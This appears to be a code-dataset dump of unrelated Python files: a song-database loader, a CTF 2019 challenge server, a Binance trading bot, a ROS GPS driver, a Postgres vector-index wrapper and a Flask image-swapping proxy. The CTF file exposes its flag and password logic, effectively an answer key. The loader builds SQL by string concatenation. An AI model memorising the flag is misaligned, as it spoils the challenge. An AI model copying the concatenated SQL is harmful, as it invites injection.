book_name, book_size, book_description, book_date, book_like, book_url)\n return book\n\n","repo_name":"wustone1995/SI507-FINAL","sub_path":"crawl_youdu.py","file_name":"crawl_youdu.py","file_ext":"py","file_size_in_byte":4135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"12334524100","text":"#! /usr/bin/env python\n# populate_db.py\n# Gina Schmalzle\n# 20140723, works\n\n\"\"\"Database populating tools for Million Song Database. These scripts assume that\nyou already created the bones for your sqlite3 database. The script to do that is\nin ../DATA/DB/build_DB/ and has the following structure:\n\nDROP TABLE IF EXISTS users;\nCREATE TABLE users (\n id INTEGER PRIMARY KEY,\n user TEXT,\n selection_number NUMBER,\n artist_id TEXT,\n artist_name TEXT,\n date_added TEXT,\n foreign_id TEXT,\n last_modified TEXT,\n song_id TEXT,\n song_name TEXT\n);\n\nThese functions allow the user to obtain a list of files that were downloaded,\nretrieve the contents of the files in the form of a dictionary, retrieve contents\na tuple, and finally a function to popultate the database.\n\nTo run in python repl (assuming your database is in the same place I have it):\n\n import populate_db as P\n P.populate_db_w_users()\n\nTo check if data have been properly uploaded, type in the terminal:\n sqlite3 yourdb.db\n SELECT * FROM users;\n\nEnjoy.\n\"\"\"\n\nimport os\nimport sqlite3\nimport ast\nimport time\nimport shutil\nimport glob\nimport unicodedata\n\ndef retrieve_user_files(path='../DATA/DOWNLOADS/'):\n \"\"\"Get list of user files in a given directory.\"\"\"\n file_list = glob.glob(path+'*.dict')\n return file_list\n\ndef retrieve_all_user_data_as_dict(files=retrieve_user_files()):\n \"\"\" Retrieve user information from file. \"\"\"\n contents_dict = {}\n for file in files:\n user = file[18:36]\n with open(file, 'r') as f:\n contents = f.read()\n contents_dict[user] = ast.literal_eval(contents)\n return contents_dict\n\ndef retrieve_all_user_data_as_list_of_tuples(files=retrieve_user_files()):\n \"\"\" Retrieve user information from file. \"\"\"\n contents_list = []\n contents_dict = retrieve_all_user_data_as_dict(files)\n for user in contents_dict:\n user_id = user\n for i in range(0, len(contents_dict[user])):\n selection_number = i\n try:\n artist_id = contents_dict[user][i]['artist_id'].encode('utf8')\n artist_name = contents_dict[user][i]['artist_name'].encode('utf8')\n date_added = contents_dict[user][i]['date_added'].encode('utf8')\n foreign_id = contents_dict[user][i]['foreign_id'].encode('utf8')\n last_modified = contents_dict[user][i]['last_modified'].encode('utf8')\n play_count = int(contents_dict[user][i]['play_count'])\n song_id = contents_dict[user][i]['song_id'].encode('utf8')\n song_name = contents_dict[user][i]['song_name'].encode('utf8')\n contents_list.append((user_id,selection_number,artist_id,\n artist_name, date_added, foreign_id, last_modified, play_count,song_id,\n song_name))\n except KeyError:\n artist_id = contents_dict[user][i]['artist_id'].encode('utf8')\n artist_name = contents_dict[user][i]['artist_name'].encode('utf8')\n date_added = contents_dict[user][i]['date_added'].encode('utf8')\n foreign_id = contents_dict[user][i]['foreign_id'].encode('utf8')\n last_modified = contents_dict[user][i]['last_modified'].encode('utf8')\n play_count = 9999\n song_id = contents_dict[user][i]['song_id'].encode('utf8')\n song_name = 'NA'\n contents_list.append((user_id,selection_number,artist_id,\n artist_name, date_added, foreign_id, last_modified, play_count, song_id,\n song_name))\n print (\"No song name for user \", user_id, \"song number\", i)\n continue\n return contents_list\n\ndef populate_db_w_users(to_print=None, db='music_user.db'):\n \"\"\"Populate database with contents of site list.\"\"\"\n list_of_users = retrieve_all_user_data_as_list_of_tuples()\n connection = sqlite3.connect(os.path.join('../DATA/DB/', db))\n with connection:\n cursor = connection.cursor()\n i = 0\n for user in list_of_users:\n i = i + 1\n mytuple = (i,user[0],user[1],user[2],user[3],user[4],user[5],user[6],user[7],user[8], user[9])\n if user == ['']:\n print('\\n Empty tuple found; skipping.\\n')\n continue\n if to_print:\n print(str(mytuple))\n try:\n cursor.execute(\n '''INSERT INTO users VALUES''' +\n str(tuple(mytuple)) )\n except:\n i = i - 1\n continue\n","repo_name":"ginaschmalzle/million_song","sub_path":"CODE/populate_db.py","file_name":"populate_db.py","file_ext":"py","file_size_in_byte":4442,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"96"} +{"seq_id":"2811824573","text":"#! /usr/bin/env python3\nimport random\nimport select\nimport sys\n\nL_WORDS = [\n \"labels\",\n \"laboratories\",\n \"labs\",\n \"labyrinths\",\n \"ladders\",\n \"ladles\",\n \"lagers\",\n \"lakes\",\n \"lamebrains\",\n \"lampreys\",\n \"landlines\",\n \"lanyards\",\n \"lasagnas\",\n \"lathes\",\n \"laughingstocks\",\n \"launderers\",\n \"lawbreakers\",\n \"layovers\",\n \"laypersons\",\n \"leeches\",\n \"legumes\",\n \"lemurs\",\n \"lentils\",\n \"leopards\",\n \"leotards\",\n \"leprechauns\",\n \"lettuces\",\n \"ligaments\",\n \"limeades\",\n \"limericks\",\n \"limes\",\n \"lions\",\n \"litterbugs\",\n \"lizards\",\n \"llamas\",\n \"lobsters\",\n \"locusts\",\n \"loganberries\",\n \"logarithms\",\n \"lolcats\",\n \"lollipops\",\n \"loudmouths\",\n \"lozenges\",\n \"lumps\",\n \"luxurious\",\n \"lynxes\",\n]\n\nFLAG = \"fb{th4t5_th3_3vi1est_th1ng_!_c4n_im4g1ne}\"\nTIMEOUT = 5\n\nif __name__ == '__main__':\n if 'bad' in sys.argv:\n print(\"Clearly you're not evil enough.\")\n sys.stdout.flush()\n sys.exit(1)\n else:\n word = random.choice(L_WORDS)\n print(\"So you know the evil handshake?\\nWhat's the secret password then?\\nThe word of the day is {}.\".format(word))\n sys.stdout.flush()\n i, o, e = select.select([sys.stdin], [], [], TIMEOUT)\n if i:\n x = sys.stdin.readline().strip()\n else:\n print(\"Too slow, move along.\")\n sys.exit(2)\n\n # sys.stderr.write(\"Received: {}\\n\".format(x))\n if x == \"Every Villain Is {}\".format(word.capitalize()):\n print(FLAG)\n sys.stdout.flush()\n sys.exit(0)\n else:\n print(\"Wrong password! Get lost do-gooder!\")\n sys.stdout.flush()\n sys.exit(3)\n","repo_name":"fbsamples/fbctf-2019-challenges","sub_path":"misc/evil/src/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":199,"dataset":"github-code","pt":"96"} +{"seq_id":"32340702445","text":"from binance.client import Client\nimport sys\ntry:\n from config import api_key,api_secret\nexcept:\n print(\"Make config.py\\npaste your api_key='<YOUR_KEY>' and api_secret='<YOUR_SECRETE_KEY>'\")\n sys.exit()\nfrom binance.websockets import BinanceSocketManager\nfrom binance.enums import *\nfrom binance.exceptions import BinanceAPIException, BinanceWithdrawException\nfrom math import floor\nimport os\n\norders = []\nlast_error_message=''\nquantity = 0\ndef process_message(msg):\n # print(\"message type: {}\".format(msg['e']))\n global quantity,last_error_message\n os.system('clear')\n print('Trading:',coin)\n print('Fraction:',fraction)\n print('Buying price:',buy_price)\n print('Selling price:',sell_price)\n print('Profit percentage:',profit)\n print('Current price: ',msg['b'])\n print('Weighted Average price:', msg['w'])\n print('High price:', msg['h'])\n print('Low price:', msg['l'])\n print('Quantity',quantity)\n print('last_error_message:',last_error_message)\n print('\\nOrders placed:-')\n for i in orders:print(i)\n\n if msg['b'] <= buy_price :\n try:\n quantity = float(client.get_asset_balance(asset=sell)['free'])*fraction/float(msg['b'])\n quantity = floor(quantity*(10**decimals))/10**decimals\n order = client.order_limit_buy(symbol=coin,quantity=quantity,price=msg['b'])\n orders.append('Bought {1} coins at {0} price'.format(msg['b'],quantity))\n except Exception as e:\n # print(e.message)\n last_error_message = e\n elif msg['b'] >= sell_price:\n try:\n quantity = float(client.get_asset_balance(asset=buy)['free'])*fraction\n quantity = floor(quantity*(10**decimals))/10**decimals\n order = client.order_limit_sell(symbol=coin,quantity=quantity,price=msg['b'])\n orders.append('Sold {1} coins at {0} price'.format(msg['b'],quantity))\n except Exception as e:\n # print(e.message)\n last_error_message = e\ndef average_price(prices):\n total = 0\n for i in prices:total+=float(i['p'])\n return total/len(prices)\n\nclient = Client(api_key, api_secret)\n\ntry:\n coin1,coin2 = input('Enter coins to trade(Default: BNB USDT ): ').upper().split()\nexcept:\n coin1 = 'BNB'\n coin2 = 'USDT'\ntry:\n coin = coin1+coin2\n prices = client.get_aggregate_trades(symbol=coin)\n buy = coin1\n sell = coin2\nexcept:\n coin = coin2+coin1\n prices = client.get_aggregate_trades(symbol=coin)\n buy = coin2\n sell = coin1\nprint(\"Current average price of\",coin,\"is\",average_price(prices))\nprint(\"Last price of\",coin,\"is\",prices[-1]['p'])\nprofit=0\nwhile profit<=0.2:\n choice = input('Buying and selling price should differ by 0.2% atleast...hit enter to continue')\n if choice == \"\":\n buy_price = input('Enter your buying price: ')\n sell_price = input('Enter your selling price: ')\n profit=(((float(sell_price)-float(buy_price))/float(buy_price))*100)\n else:break\n\nfraction = input('Enter fraction of quantity(ex: 0.5 ,Default: 1.0): ')\nif fraction == '':\n fraction = 1\nelse:\n fraction = float(fraction)\n\ndecimals = float(input('Decimals to round(Ex:- 2)'))\nprint(\"Profit margin: \",profit,\"%\")\n\nbm = BinanceSocketManager(client)\nbm.start_symbol_ticker_socket(coin, process_message)\nbm.start()\n","repo_name":"SauravKanchan/Binance_bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3332,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"23967119811","text":"import math\n\nimport rospy\n\nfrom sensor_msgs.msg import NavSatFix, NavSatStatus, TimeReference\nfrom geometry_msgs.msg import TwistStamped, QuaternionStamped\nfrom tf.transformations import quaternion_from_euler\n\nfrom libnmea_navsat_driver.checksum_utils import check_nmea_checksum\nimport libnmea_navsat_driver.parser\n\n\nclass RosNMEADriver(object):\n \"\"\"ROS driver for NMEA GNSS devices.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize the ROS NMEA driver.\n\n :ROS Publishers:\n - NavSatFix publisher on the 'fix' channel.\n - TwistStamped publisher on the 'vel' channel.\n - QuaternionStamped publisher on the 'heading' channel.\n - TimeReference publisher on the 'time_reference' channel.\n\n :ROS Parameters:\n - ~time_ref_source (str)\n The name of the source in published TimeReference messages. (default None)\n - ~useRMC (bool)\n If true, use RMC NMEA messages. If false, use GGA and VTG messages. (default False)\n - ~epe_quality0 (float)\n Value to use for default EPE quality for fix type 0. (default 1000000)\n - ~epe_quality1 (float)\n Value to use for default EPE quality for fix type 1. (default 4.0)\n - ~epe_quality2 (float)\n Value to use for default EPE quality for fix type 2. (default (0.1)\n - ~epe_quality4 (float)\n Value to use for default EPE quality for fix type 4. (default 0.02)\n - ~epe_quality5 (float)\n Value to use for default EPE quality for fix type 5. (default 4.0)\n - ~epe_quality9 (float)\n Value to use for default EPE quality for fix type 9. (default 3.0)\n \"\"\"\n self.fix_pub = rospy.Publisher('fix', NavSatFix, queue_size=1)\n self.vel_pub = rospy.Publisher('vel', TwistStamped, queue_size=1)\n self.heading_pub = rospy.Publisher(\n 'heading', QuaternionStamped, queue_size=1)\n self.use_GNSS_time = rospy.get_param('~use_GNSS_time', False)\n if not self.use_GNSS_time:\n self.time_ref_pub = rospy.Publisher(\n 'time_reference', TimeReference, queue_size=1)\n\n self.time_ref_source = rospy.get_param('~time_ref_source', None)\n self.use_RMC = rospy.get_param('~useRMC', False)\n self.valid_fix = False\n\n # epe = estimated position error\n self.default_epe_quality0 = rospy.get_param('~epe_quality0', 1000000)\n self.default_epe_quality1 = rospy.get_param('~epe_quality1', 4.0)\n self.default_epe_quality2 = rospy.get_param('~epe_quality2', 0.1)\n self.default_epe_quality4 = rospy.get_param('~epe_quality4', 0.02)\n self.default_epe_quality5 = rospy.get_param('~epe_quality5', 4.0)\n self.default_epe_quality9 = rospy.get_param('~epe_quality9', 3.0)\n self.using_receiver_epe = False\n\n self.lon_std_dev = float(\"nan\")\n self.lat_std_dev = float(\"nan\")\n self.alt_std_dev = float(\"nan\")\n\n \"\"\"Format for this dictionary is the fix type from a GGA message as the key, with\n each entry containing a tuple consisting of a default estimated\n position error, a NavSatStatus value, and a NavSatFix covariance value.\"\"\"\n self.gps_qualities = {\n # Unknown\n -1: [\n self.default_epe_quality0,\n NavSatStatus.STATUS_NO_FIX,\n NavSatFix.COVARIANCE_TYPE_UNKNOWN\n ],\n # Invalid\n 0: [\n self.default_epe_quality0,\n NavSatStatus.STATUS_NO_FIX,\n NavSatFix.COVARIANCE_TYPE_UNKNOWN\n ],\n # SPS\n 1: [\n self.default_epe_quality1,\n NavSatStatus.STATUS_FIX,\n NavSatFix.COVARIANCE_TYPE_APPROXIMATED\n ],\n # DGPS\n 2: [\n self.default_epe_quality2,\n NavSatStatus.STATUS_SBAS_FIX,\n NavSatFix.COVARIANCE_TYPE_APPROXIMATED\n ],\n # RTK Fix\n 4: [\n self.default_epe_quality4,\n NavSatStatus.STATUS_GBAS_FIX,\n NavSatFix.COVARIANCE_TYPE_APPROXIMATED\n ],\n # RTK Float\n 5: [\n self.default_epe_quality5,\n NavSatStatus.STATUS_GBAS_FIX,\n NavSatFix.COVARIANCE_TYPE_APPROXIMATED\n ],\n # WAAS\n 9: [\n self.default_epe_quality9,\n NavSatStatus.STATUS_GBAS_FIX,\n NavSatFix.COVARIANCE_TYPE_APPROXIMATED\n ]\n }\n\n def add_sentence(self, nmea_string, frame_id, timestamp=None):\n \"\"\"Public method to provide a new NMEA sentence to the driver.\n\n Args:\n nmea_string (str): NMEA sentence in string form.\n frame_id (str): TF frame ID of the GPS receiver.\n timestamp(rospy.Time, optional): Time the sentence was received.\n If timestamp is not specified, the current time is used.\n\n Returns:\n bool: True if the NMEA string is successfully processed, False if there is an error.\n \"\"\"\n if not check_nmea_checksum(nmea_string):\n rospy.logwarn(\"Received a sentence with an invalid checksum. \" +\n \"Sentence was: %s\" % repr(nmea_string))\n return False\n\n parsed_sentence = libnmea_navsat_driver.parser.parse_nmea_sentence(\n nmea_string)\n if not parsed_sentence:\n rospy.logdebug(\n \"Failed to parse NMEA sentence. Sentence was: %s\" %\n nmea_string)\n return False\n\n if timestamp:\n current_time = timestamp\n else:\n current_time = rospy.get_rostime()\n current_fix = NavSatFix()\n current_fix.header.stamp = current_time\n current_fix.header.frame_id = frame_id\n if not self.use_GNSS_time:\n current_time_ref = TimeReference()\n current_time_ref.header.stamp = current_time\n current_time_ref.header.frame_id = frame_id\n if self.time_ref_source:\n current_time_ref.source = self.time_ref_source\n else:\n current_time_ref.source = frame_id\n\n if not self.use_RMC and 'GGA' in parsed_sentence:\n current_fix.position_covariance_type = \\\n NavSatFix.COVARIANCE_TYPE_APPROXIMATED\n\n data = parsed_sentence['GGA']\n\n if self.use_GNSS_time:\n if math.isnan(data['utc_time'][0]):\n rospy.logwarn(\"Time in the NMEA sentence is NOT valid\")\n return False\n current_fix.header.stamp = rospy.Time(data['utc_time'][0], data['utc_time'][1])\n\n fix_type = data['fix_type']\n if not (fix_type in self.gps_qualities):\n fix_type = -1\n gps_qual = self.gps_qualities[fix_type]\n default_epe = gps_qual[0]\n current_fix.status.status = gps_qual[1]\n current_fix.position_covariance_type = gps_qual[2]\n\n self.valid_fix = (fix_type > 0)\n\n current_fix.status.service = NavSatStatus.SERVICE_GPS\n\n latitude = data['latitude']\n if data['latitude_direction'] == 'S':\n latitude = -latitude\n current_fix.latitude = latitude\n\n longitude = data['longitude']\n if data['longitude_direction'] == 'W':\n longitude = -longitude\n current_fix.longitude = longitude\n\n # Altitude is above ellipsoid, so adjust for mean-sea-level\n altitude = data['altitude'] + data['mean_sea_level']\n current_fix.altitude = altitude\n\n # use default epe std_dev unless we've received a GST sentence with\n # epes\n if not self.using_receiver_epe or math.isnan(self.lon_std_dev):\n self.lon_std_dev = default_epe\n if not self.using_receiver_epe or math.isnan(self.lat_std_dev):\n self.lat_std_dev = default_epe\n if not self.using_receiver_epe or math.isnan(self.alt_std_dev):\n self.alt_std_dev = default_epe * 2\n\n hdop = data['hdop']\n current_fix.position_covariance[0] = (hdop * self.lon_std_dev) ** 2\n current_fix.position_covariance[4] = (hdop * self.lat_std_dev) ** 2\n current_fix.position_covariance[8] = (\n 2 * hdop * self.alt_std_dev) ** 2 # FIXME\n\n self.fix_pub.publish(current_fix)\n\n if not (math.isnan(data['utc_time'][0]) or self.use_GNSS_time):\n current_time_ref.time_ref = rospy.Time(\n data['utc_time'][0], data['utc_time'][1])\n self.last_valid_fix_time = current_time_ref\n self.time_ref_pub.publish(current_time_ref)\n\n elif not self.use_RMC and 'VTG' in parsed_sentence:\n data = parsed_sentence['VTG']\n\n # Only report VTG data when you've received a valid GGA fix as\n # well.\n if self.valid_fix:\n current_vel = TwistStamped()\n current_vel.header.stamp = current_time\n current_vel.header.frame_id = frame_id\n current_vel.twist.linear.x = data['speed'] * math.sin(data['true_course'])\n current_vel.twist.linear.y = data['speed'] * math.cos(data['true_course'])\n self.vel_pub.publish(current_vel)\n\n elif 'RMC' in parsed_sentence:\n data = parsed_sentence['RMC']\n\n if self.use_GNSS_time:\n if math.isnan(data['utc_time'][0]):\n rospy.logwarn(\"Time in the NMEA sentence is NOT valid\")\n return False\n current_fix.header.stamp = rospy.Time(data['utc_time'][0], data['utc_time'][1])\n\n # Only publish a fix from RMC if the use_RMC flag is set.\n if self.use_RMC:\n if data['fix_valid']:\n current_fix.status.status = NavSatStatus.STATUS_FIX\n else:\n current_fix.status.status = NavSatStatus.STATUS_NO_FIX\n\n current_fix.status.service = NavSatStatus.SERVICE_GPS\n\n latitude = data['latitude']\n if data['latitude_direction'] == 'S':\n latitude = -latitude\n current_fix.latitude = latitude\n\n longitude = data['longitude']\n if data['longitude_direction'] == 'W':\n longitude = -longitude\n current_fix.longitude = longitude\n\n current_fix.altitude = float('NaN')\n current_fix.position_covariance_type = \\\n NavSatFix.COVARIANCE_TYPE_UNKNOWN\n\n self.fix_pub.publish(current_fix)\n\n if not (math.isnan(data['utc_time'][0]) or self.use_GNSS_time):\n current_time_ref.time_ref = rospy.Time(\n data['utc_time'][0], data['utc_time'][1])\n self.time_ref_pub.publish(current_time_ref)\n\n # Publish velocity from RMC regardless, since GGA doesn't provide\n # it.\n if data['fix_valid']:\n current_vel = TwistStamped()\n current_vel.header.stamp = current_time\n current_vel.header.frame_id = frame_id\n current_vel.twist.linear.x = data['speed'] * \\\n math.sin(data['true_course'])\n current_vel.twist.linear.y = data['speed'] * \\\n math.cos(data['true_course'])\n self.vel_pub.publish(current_vel)\n elif 'GST' in parsed_sentence:\n data = parsed_sentence['GST']\n\n # Use receiver-provided error estimate if available\n self.using_receiver_epe = True\n self.lon_std_dev = data['lon_std_dev']\n self.lat_std_dev = data['lat_std_dev']\n self.alt_std_dev = data['alt_std_dev']\n elif 'HDT' in parsed_sentence:\n data = parsed_sentence['HDT']\n if data['heading']:\n current_heading = QuaternionStamped()\n current_heading.header.stamp = current_time\n current_heading.header.frame_id = frame_id\n q = quaternion_from_euler(0, 0, math.radians(data['heading']))\n current_heading.quaternion.x = q[0]\n current_heading.quaternion.y = q[1]\n current_heading.quaternion.z = q[2]\n current_heading.quaternion.w = q[3]\n self.heading_pub.publish(current_heading)\n else:\n return False\n\n @staticmethod\n def get_frame_id():\n \"\"\"Get the TF frame_id.\n\n Queries rosparam for the ~frame_id param. If a tf_prefix param is set,\n the frame_id is prefixed with the prefix.\n\n Returns:\n str: The fully-qualified TF frame ID.\n \"\"\"\n frame_id = rospy.get_param('~frame_id', 'gps')\n # Add the TF prefix\n prefix = \"\"\n prefix_param = rospy.search_param('tf_prefix')\n if prefix_param:\n prefix = rospy.get_param(prefix_param)\n return \"%s/%s\" % (prefix, frame_id)\n else:\n return frame_id\n","repo_name":"ros-drivers/nmea_navsat_driver","sub_path":"src/libnmea_navsat_driver/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":13382,"program_lang":"python","lang":"en","doc_type":"code","stars":188,"dataset":"github-code","pt":"96"} +{"seq_id":"73933509435","text":"from psycopg_pool import ConnectionPool\nfrom psycopg import sql\nfrom typing import Any, Dict, List, Optional, Tuple\nfrom citrusdb.db import BaseDB\nimport citrusdb.db.postgres.queries as queries\nfrom citrusdb.db.postgres.query_builder import QueryBuilder\nfrom citrusdb.utils.types import IDs\nfrom citrusdb.utils.utils import convert_row_to_dict\n\n\nclass PostgresDB(BaseDB):\n _pool: ConnectionPool\n\n def __init__(\n self,\n **kwargs: Dict[str, Any]\n ):\n # Setup connection pool\n self._pool = ConnectionPool(kwargs=kwargs)\n\n # Create index_manager and index_data table if they don't exist already\n with self._pool.connection() as conn:\n with conn.cursor() as cur:\n cur.execute(queries.CREATE_INDEX_MANAGER_TABLE)\n cur.execute(queries.CREATE_INDEX_DATA_TABLE)\n conn.commit()\n\n def create_index(\n self,\n name: str,\n max_elements: int,\n M: int,\n ef_construction: int,\n allow_replace_deleted: bool,\n dimensions: Optional[int] = 1536,\n ):\n ef = ef_construction\n parameters = (name, dimensions, max_elements, M, ef, ef_construction, allow_replace_deleted)\n # Create new index entry to postgres db\n with self._pool.connection() as conn:\n with conn.cursor() as cur:\n cur.execute(queries.INSERT_INDEX_TO_MANAGER, parameters)\n conn.commit()\n\n def delete_vectors_from_index(\n self,\n index_id: int,\n ids: IDs\n ):\n \"\"\"\n Delete vectors with given list of IDs from specific index\n\n index_id: ID of index where the elements belong\n ids: List of IDs to be deleted\n \"\"\"\n\n vector_ids = []\n parameters = [ids, index_id]\n with self._pool.connection() as conn:\n with conn.cursor() as cur:\n for vector_id in cur.execute(queries.DELETE_VECTORS_FROM_INDEX, parameters):\n vector_ids.append(vector_id[0])\n conn.commit()\n\n return vector_ids\n\n def filter_vectors(self, index_name: str, filters: List[Dict]):\n \"\"\"\n Get list of IDs of vectors that match filters.\n\n index_name: Name of index where the elements belong\n filters: List of filters to be applied\n \"\"\"\n\n with self._pool.connection() as conn:\n query_builder = QueryBuilder(conn)\n res = query_builder.execute_query(index_name, filters)\n allowed_ids = []\n for row in res:\n allowed_ids.append(row[0])\n return allowed_ids\n\n def get_indices(self):\n \"\"\"\n Get all index details\n \"\"\"\n with self._pool.connection() as conn:\n with conn.cursor() as cur:\n cur.execute(queries.GET_ALL_INDEX_DETAILS)\n return cur.fetchall()\n\n def get_index_details(\n self,\n name: str\n ) -> Optional[Tuple[int, str, int, int, int, int, int, bool]]:\n \"\"\"\n Get specific index details\n\n name: Name of index to fetch\n \"\"\"\n parameters = (name,)\n with self._pool.connection() as conn:\n with conn.cursor() as cur:\n cur.execute(queries.GET_INDEX_DETAILS_BY_NAME, parameters)\n return cur.fetchone()\n\n def get_all_vectors_in_index(self, name: str, include: Dict) -> List[Dict]:\n \"\"\"\n Get all vectors in index\n\n name: Name of index\n include: Dictionary of columns to be returned\n \"\"\"\n index_details = self.get_index_details(name)\n if index_details is None:\n raise ValueError(f\"Index '{name}' does not exist\")\n\n cols = [sql.Identifier(\"id\")]\n if include[\"document\"]:\n cols.append(sql.Identifier(\"text\"))\n if include[\"metadata\"]:\n cols.append(sql.Identifier(\"metadata\"))\n elif include[\"metadata\"]:\n cols.append(sql.Identifier(\"metadata\"))\n\n index_id = index_details[0]\n parameters = (index_id,)\n with self._pool.connection() as conn:\n with conn.cursor() as cur:\n query = sql.SQL(queries.GET_ALL_VECTORS).format(\n sql.SQL(\", \").join(cols)\n )\n cur.execute(query, parameters)\n rows = cur.fetchall()\n return [convert_row_to_dict(row=row, include=include, with_embedding=True) for row in rows]\n\n def get_vector_ids_of_results(\n self,\n name: str,\n results: List[List[int]],\n include: Dict\n ):\n \"\"\"\n Get user facing IDs of results\n\n name: Name of index\n results: List of list of integer HNSW labels\n include: Dictionary of columns to be returned\n \"\"\"\n index_details = self.get_index_details(name)\n if index_details is None:\n raise ValueError(f\"Index '{name}' does not exist\")\n\n cols = [sql.Identifier(\"id\")]\n if include[\"document\"]:\n cols.append(sql.Identifier(\"text\"))\n if include[\"metadata\"]:\n cols.append(sql.Identifier(\"metadata\"))\n elif include[\"metadata\"]:\n cols.append(sql.Identifier(\"metadata\"))\n\n returning_list = []\n unordered_rows_list = []\n index_id = index_details[0]\n\n with self._pool.connection() as conn:\n with conn.cursor() as cur:\n data = []\n for ids in results:\n ids_list = []\n for id in ids:\n ids_list.append(int(id))\n data.append([ids_list, index_id])\n\n query = sql.SQL(queries.GET_VECTOR_IDS_OF_RESULTS).format(\n sql.SQL(\", \").join(cols)\n )\n cur.executemany(\n query,\n data,\n returning=True\n )\n while True:\n rows = cur.fetchall()\n unordered_rows_list.append(rows)\n if not cur.nextset():\n break;\n\n conn.commit()\n\n # Order rows according to order of id in ids list\n for i, ids in enumerate(results):\n unordered_rows = unordered_rows_list[i]\n ordered_rows = []\n for id in ids:\n low = 0; high = len(unordered_rows) - 1\n while (low <= high):\n mid = low + (high - low)//2\n curr_vector_id = unordered_rows[mid][0]\n if curr_vector_id == id:\n ordered_rows.append(\n convert_row_to_dict(\n row=unordered_rows[mid],\n include=include\n )\n )\n break\n elif curr_vector_id < id:\n low = mid + 1\n else:\n high = mid - 1\n\n returning_list.append(ordered_rows)\n return returning_list\n\n def insert_to_index(\n self,\n data\n ):\n \"\"\"\n Insert vectors to index\n\n data: Tuple of tuples corresponding to each row\n \"\"\"\n vector_ids = []\n with self._pool.connection() as conn:\n with conn.cursor() as cur:\n cur.executemany(queries.INSERT_DATA_TO_INDEX, data, returning=True)\n while True:\n vector_ids.append(cur.fetchone()[0]) # type: ignore\n if not cur.nextset():\n break;\n\n conn.commit()\n\n return vector_ids\n\n def update_ef(\n self,\n name: str,\n ef: int\n ):\n \"\"\"\n Update ef for an index\n\n name: Name of index to be updated\n ef: New ef value\n \"\"\"\n parameters = (ef, name)\n with self._pool.connection() as conn:\n with conn.cursor() as cur:\n cur.execute(queries.UPDATE_EF, parameters)\n conn.commit()\n","repo_name":"0xDebabrata/citrus","sub_path":"citrusdb/db/postgres/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":8174,"program_lang":"python","lang":"en","doc_type":"code","stars":88,"dataset":"github-code","pt":"96"} +{"seq_id":"37153720385","text":"from django.db import models\n\n\nclass Orders(models.Model):\n table_row_index = models.IntegerField(unique=True)\n table_row_number = models.IntegerField()\n order_number = models.IntegerField(\n unique=True,\n verbose_name='Номер заказа'\n )\n cost_usd = models.DecimalField(\n max_digits=12,\n decimal_places=2,\n verbose_name='Цена в долларах'\n )\n cost_rub = models.DecimalField(\n max_digits=12,\n decimal_places=2,\n verbose_name='Цена в рубля'\n )\n delivery_date = models.CharField(\n max_length=10,\n verbose_name='Дата доставки'\n )\n created_at = models.DateTimeField(\n verbose_name='Дата создания'\n )\n updated_at = models.DateTimeField(\n verbose_name='Дата обновления'\n )\n\n class Meta:\n managed = False\n db_table = 'orders'\n verbose_name = 'Заказ'\n verbose_name_plural = 'Заказы'\n\n def __str__(self):\n return self.order_number\n","repo_name":"elvir906/GoogleSheetsAPI","sub_path":"service/app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"19648214560","text":"import os\nimport json\nimport numpy as np\n\ndef get_feature_array(json_path, seg_path):\n with open(json_path, \"r\") as f:\n json_dict = json.load(f)\n \n t1 = []\n for i in json_dict[\"training\"]:\n t1.append(\"../data/\" + i[\"image\"][0])\n id_ls = [i.split(\"/\")[-2].split(\"_\")[-1] for i in t1]\n\n arr = []\n for id_ in id_ls:\n path = os.path.join(i + \".npy\")\n arr.append(np.load(path))\n arr = np.concatenate(arr, axis=0)\n\n return arr, id_ls","repo_name":"shanmukh05/MGMT-Methylation-Prediction-in-Brain-Tumors","sub_path":"features/ensemble.py","file_name":"ensemble.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"24027924518","text":"from flask import Flask, Response, request, url_for\nfrom bs4 import BeautifulSoup\nfrom urllib.parse import urljoin\nfrom PIL import Image\nimport os\nimport io\nimport urllib.request\nimport random\napp = Flask(__name__)\n\n@app.route('/')\ndef printUsage():\n\treturn \"TODO\"\n\n@app.route('/<path:url>')\ndef proxy(url):\n\tprotocol = \"http://\"\n\tfull_url = protocol+url\n\tif len(request.query_string) != 0:\n\t\tfull_url += \"?\"+request.query_string.decode('utf-8')\n\tprint('DEBUG:', full_url)\n\tresponse = urllib.request.urlopen(full_url)\n\tprint(response.info()['Content-Type'])\n\tmimetype = response.info()['Content-Type'].split(';',1)[0]\n\tdata = None\n\tif mimetype.startswith(\"image/\"):\n\t\textension = mimetype.split(\"/\")[-1]\n\t\tdimension = Image.open(io.BytesIO(response.read())).size\n\t\tprint(\"Trying to get \", extension, \" with \", dimension)\n\t\timage_to_load = get_image(extension, dimension)\n\t\tf = open(image_to_load,\"rb\")\n\t\tdata = f.read()\n\t\tf.close()\n\telif mimetype == \"text/html\":\n\t\tsoup = BeautifulSoup(response.read())\n\t\tto_rewrite = soup.find_all(needs_rewrite)\n\t\tfor elem in to_rewrite:\n\t\t\tfor attr in rewrite_attributes:\n\t\t\t\tif elem.has_attr(attr):\n\t\t\t\t\telem[attr] = rewrite_url(full_url, elem[attr])\n\t\tdata = str(soup)\n\telse:\n\t\tdata = response.read()\n\treturn Response(data, status=response.getcode(),\n\t\t\theaders=response.getheaders())\n\nrewrite_attributes = ['href','src']\ndef needs_rewrite(tag):\n\tglobal rewrite_attributes\n\tfor a in rewrite_attributes:\n\t\tif tag.has_attr(a):\n\t\t\treturn True\n\treturn False\n\ndef rewrite_url(full_url, relative_url):\n\tglobal app\n\ttotal_url = urljoin(full_url, relative_url)\n\tprint('DEBUG:',total_url)\n\ttry:\n\t\targument = total_url.split('://',1)[1]\n\texcept 